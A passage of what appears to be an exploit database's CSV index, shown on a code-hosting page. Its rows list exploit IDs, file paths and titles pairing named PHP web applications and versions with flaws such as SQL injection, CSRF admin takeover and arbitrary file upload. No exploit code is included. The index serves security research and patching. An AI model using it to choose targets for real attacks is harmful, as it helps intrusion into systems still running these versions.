45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45721,exploits/php/webapps/45721.txt,"Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45722,exploits/php/webapps/45722.txt,"School Event Management System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45723,exploits/php/webapps/45723.txt,"School Event Management System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45724,exploits/php/webapps/45724.txt,"School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45725,exploits/php/webapps/45725.txt,"School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45726,exploits/php/webapps/45726.txt,"School Attendance Monitoring System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45727,exploits/php/webapps/45727.txt,"School Attendance Monitoring System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45728,exploits/php/webapps/45728.txt,"PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45729,exploits/php/webapps/45729.txt,"RhinOS CMS 3.x - Arbitrary File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45730,exploits/php/webapps/45730.txt,"E-Negosyo System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45731,exploits/php/webapps/45731.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue